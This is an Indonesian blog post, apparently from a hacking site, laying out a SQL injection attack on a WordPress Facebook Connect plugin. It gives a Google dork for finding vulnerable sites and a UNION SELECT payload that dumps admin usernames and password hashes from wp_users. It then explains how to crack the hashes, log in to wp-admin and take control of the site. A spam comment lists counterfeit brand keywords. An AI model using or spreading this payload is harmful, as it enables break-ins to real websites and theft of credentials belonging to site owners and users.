assalamualaikum
Dork: inurl:”fbconnect_action=myhome”
Exploit: ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users–

Klik situs Targetnya

?fbconnect_action=myhome&userid=
Dengan EXPLOIT ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users–

Sekarang keluar Username dan Password Admin.
Encrypt Password MD5 (Blowfish) bisa ke http://www.md5decrypter.co.uk/ atau dengan menggunakan tools
http://www.easy-share.com/1917245768/passwordspro.zip
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
akirnya Masuk Dah di dashbordnya, terserah mw diapain
by admin : h3ykh3nd
+ komentar + 1 komentar
2015-10-41leilei
michael kors
hermes outlet
nike tn pas cher
coach outlet online
true religion
christian louboutin shoes
kate spade outlet
nike store uk
michael kors outlet
michael kors handbags
michael kors bags
michael kors uk
cheap basketball shoes
nike blazers shoes
nike running shoes
michael kors bag
louis vuitton handbags
tory burch
michael kors handbags
michael kors bags
jordan retro 13
north face jackets
uggs outlet
fake oakleys
toms outlet
jordan 6s
moncler jackets outlet
michael kors outlet online
louis vuitton
ghd hair straighteners
nike air max 90
michael kors outlet
christian louboutin uk
cheap toms
air jordan homme
coach outlet store online
ray ban sunglasses
kate spade
mulberry uk
uggs on sale
Posting Komentar
Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik